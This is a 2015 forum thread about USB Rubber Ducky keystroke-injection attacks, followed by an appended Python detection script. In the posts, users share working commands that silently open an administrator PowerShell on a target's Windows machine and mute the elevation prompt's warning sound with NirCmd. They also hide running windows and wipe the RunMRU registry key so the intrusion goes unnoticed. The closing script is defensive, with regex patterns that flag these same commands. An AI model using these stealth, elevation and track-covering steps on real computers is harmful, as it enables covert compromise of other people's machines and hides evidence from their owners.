SilentHacker
Posted September 8, 2015

Hi! Before anything else, I should mention that I am new to all of this (my Rubber Ducky hasn't even arrived yet), but I've been digging around and I think I've come up with a pretty decent alternative to hiding windows in Windows (without having them scroll down and out of sight, which is very unstealth-like). Like I've mentioned, my Rubber Ducky hasn't arrived yet, so I haven't gotten around to learning the script to its fullest. For that reason I'm going to be sharing what the Ducky should do, step by step, instead of the actual inject.bin.

The Stealth Enhancer:

After having the Ducky open the Run command (GUI + R), instead of having it write something like "cmd" or "powershell", give this a try and see for yourself:

    powershell -windowstyle hidden start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

Now you have to make the Ducky go LEFT and ENTER to accept opening PowerShell as administrator. You can still catch a few glimpses of the two PowerShell windows that get opened, but they immediately disappear. Although it's not visible, one of the windows IS STILL OPEN so long as you don't click anywhere else. To prove that the PowerShell running as administrator is still open, type this out (without quotes; it's important that you type it): "start-process notepad.exe". This will open Notepad. This works fine on all my computers (Windows 8 and 10); I'm not sure about others, please let me know.

Removing the "Run as Admin" sound:

Some computers have this annoying warning sound when the box to confirm running something as admin pops up. This sound is especially annoying if you want to go undetected. There are two alternatives:

1) You could make the Ducky type FN + ESC; this will mute or unmute the computer. The problem with this option is that, if the target computer is already muted, this will produce the opposite of the desired effect. So if you are using this one, make sure the target computer is not muted.

2) For this one we need the help of a tool called NirCmd. This tool is, I believe, a great asset for Rubber Ducky users. The potential for pranks is enormous. Here's what to do:

- First of all, you should get NirCmd: http://www.nirsoft.net/utils/nircmd.zip
- Unzip the file and copy "nircmd.exe" (or "nircmd") to the Rubber Ducky's SD card.
- Next, make the Rubber Ducky run this after GUI + R:

    powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit

What this does is open a hidden PowerShell and mute the system; the dialog box pops up; a hidden administrator PowerShell opens (closing the previous one) and restores sound to the system.

Alternatively, you could run this (if you don't want to restore sound to the system and want to keep it muted):

    powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

WARNING: Make sure to change "F:/nircmd/nircmd.exe" to whatever path your nircmd.exe file has on your Ducky.

Other applications for NirCmd:

- Open and hide apps (open Notepad and hide it, but it remains active and you can write whatever you want as long as you don't click anywhere else):

    start-process notepad.exe; F:/nircmd/nircmd.exe win hide class notepad

  I don't know the full extent of this "hide" feature. I tried it with Google Chrome, but I didn't know the "class", so it didn't work. Play around with it and let me know.

- Show hidden apps:

    F:/nircmd/nircmd.exe win show class notepad

- Make the computer read a text file (cool prank):

    F:/nircmd/nircmd.exe speak file "c:\temp\speak.txt"

This is all I have had time to play with in the past few days; please point out any mistakes I might have made and let me know your ideas. Play around with NirCmd's other features and share them here. Sorry for the messy post.
LukasS
Posted September 9, 2015

Well done :) It works ... You should do more resources like this ... thank you :D
sud0nick
Posted September 9, 2015

Great job on finding the windowstyle hidden argument for PowerShell. I'm not sure your idea with nircmd will work because the Ducky doesn't mount as a drive on a computer. It registers as a HID only. Maybe something like Twin Duck will help make this work.
LukasS
Posted September 9, 2015

> Great job on finding the windowstyle hidden argument for PowerShell. I'm not sure your idea with nircmd will work because the Ducky doesn't mount as a drive on a computer. It registers as a HID only. Maybe something like Twin Duck will help make this work.

It works with Twin Duck ...

Edited September 9, 2015 by LukasS
SilentHacker (Author)
Posted September 9, 2015

I've noticed that the script that mutes and restores sound to the system loses track, so to speak, of the PowerShell window:

    powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit

To solve this, you should use the one that just mutes the system and afterwards make the Ducky type the script that returns the sound:

    powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit

(And then make the Ducky type:)

    F:/nircmd/nircmd.exe mutesysvolume 0

Since at this point the window is already hidden, there should be no rush to unmute the system. And this way, the Ducky can continue typing in the PowerShell whatever you want it to. Again: do remember to change "F:/nircmd/nircmd.exe" to the actual path of the file on your Ducky. Thank you for the feedback, and thank you for pointing out the need for the Twin Duck firmware. Always happy to help :)
LukasS
Posted September 10, 2015

Just one point ... you need to clear the text on GUI + R after the job is done ... how will you make it?

Edited September 10, 2015 by LukasS
SilentHacker (Author)
Posted September 10, 2015

To erase the Run command history, simply make the Ducky type this in the PowerShell:

    reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

This will erase ALL of the history, not just what the Ducky did. But no one should notice, and even if they do, they shouldn't find it suspicious.

To give credit where credit is due: Source
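A defender-side view of the commands shared in this thread, as an added example that is not from any of the posts: a small Python scorer run over constructed Sysmon-style process-creation records that flags the hidden-window PowerShell launched from the Run dialog (explorer.exe as parent), the nested elevated start-process, the NirCmd mute, and the RunMRU wipe from the last post. The "ParentImage|Image|CommandLine" record layout, the rule weights and the alert threshold are all assumptions for this example.

```python
import re

# Constructed Sysmon-style process-creation records for this example
# (assumed "ParentImage|Image|CommandLine" layout); none come from a real host.
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|powershell -windowstyle hidden start-process "
    "powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit",
    "explorer.exe|powershell.exe|powershell -windowstyle hidden F:/nircmd/nircmd.exe "
    "mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit",
    "powershell.exe|reg.exe|reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows"
    "\\CurrentVersion\\Explorer\\RunMRU /va /f",
    "svchost.exe|powershell.exe|powershell -NoProfile -File C:\\scripts\\backup.ps1",   # benign
    "cmd.exe|reg.exe|reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",  # benign
]

# Each rule: name, regex over the command line, and an assumed weight.
RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("hidden_elevation", re.compile(r"start-process.*-verb\s+runas.*hidden", re.I), 3),
    ("nircmd_mute", re.compile(r"nircmd(?:\.exe)?\s+mutesysvolume", re.I), 2),
    ("runmru_wipe", re.compile(r"\breg(?:\.exe)?\s+delete\s+\S*\\RunMRU\b", re.I), 4),
]

def parse_event(line):
    """Split one constructed record into (parent, image, command line)."""
    parent, image, cmdline = line.split("|", 2)
    return parent.lower(), image.lower(), cmdline

def score_event(line):
    """Return (score, [matched rule names]) for one record."""
    parent, image, cmdline = parse_event(line)
    hits = [name for name, rx, _ in RULES if rx.search(cmdline)]
    score = sum(w for name, _, w in RULES if name in hits)
    # explorer.exe spawning a hidden PowerShell is what a Run-dialog (GUI + R) launch looks like
    if parent == "explorer.exe" and "hidden_window" in hits:
        hits.append("run_dialog_parent")
        score += 2
    return score, hits

def scan(lines, threshold=4):
    """Return (image, score, hits) for every record whose score reaches the threshold."""
    alerts = []
    for line in lines:
        score, hits = score_event(line)
        if score >= threshold:
            alerts.append((parse_event(line)[1], score, hits))
    return alerts

if __name__ == "__main__":
    for image, score, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: score={score} hits={','.join(hits)}")
```

The RunMRU rule fires on `reg delete ... \RunMRU` regardless of the `/va /f` switches, so a partial wipe of the Run history is caught as well.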